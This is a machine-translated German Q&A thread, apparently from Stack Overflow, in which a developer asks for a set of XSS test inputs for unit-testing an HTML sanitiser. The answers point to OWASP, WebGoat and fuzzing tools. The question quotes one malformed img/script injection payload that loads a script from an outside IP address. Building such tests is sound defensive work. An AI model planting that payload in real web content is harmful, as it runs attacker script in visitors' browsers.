XSS Torture Test - gibt es sie?

Question

Ich suche eine html sanitiser zu schreiben, und offensichtlich zu testen / beweisen, dass es richtig funktioniert, habe ich eine Reihe von XSS Beispiele müssen dagegen, um die Tonhöhe zu sehen, wie er ausführt. Hier ist ein von Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Ich weiß, es gibt eine Mime Torture Test die verschachtelte von mehreren umfasst E-Mails mit Anhängen, die Mime-Decoder zu testen verwendet wird (wenn sie es richtig entschlüsseln können, dann arbeiten sie bewiesen haben). Ich bin im Grunde für eine equivilent für XSS suchen, das heißt, eine Liste von Beispielen von zwielichtigen html, die ich gerade an meinem sanitiser werfen kann, um sicherzustellen, dass es funktioniert OK.

Wenn jemand auch keine gute Ressourcen, wie die sanitiser schreiben (das heißt, welche gemeinsamen Exploits Menschen versuchen, zu verwenden, usw.) sie dankbar zu empfangen werden würde.

Vielen Dank im Voraus: -)

Edit: Sorry, wenn dies vorher nicht klar war, aber ich war nach einer Reihe von Folter Tests, damit ich Unit-Tests für die sanitiser schreiben kann, nicht im Browser testen, usw. Die Quelldaten in der Theorie haben kommen von überall -. nicht nur einen Browser

Answer 1

Werfen Sie einen Blick auf diese XSS Cheat-Liste: https://www.owasp.org/ index.php / XSS_Filter_Evasion_Cheat_Sheet

Answer 2

XSS Me eine große Firefox-Plugin ist, dass Sie gegen ausführen können Ihre sanitizer.

Answer 3

Schauen Sie sich OWASP . Sie haben gute Hinweise, wie XSS arbeitet, was zu suchen, und auch die WebGoat Projekt, in dem Sie Ihre Hand auf einer verwundbare Stelle ausprobieren können.

Answer 4

Sie könnten Jesse Ruderman des jsfunfuzz versuchen ( http: //www.squarefree .com / 2007/08/02 / Einführung-jsfunfuzz / ), die Zufallsdaten in Ihrem Javascript wirft versuchen, es zu brechen. Es scheint, das Firefox-Team dies mit großem Erfolg eingesetzt hat.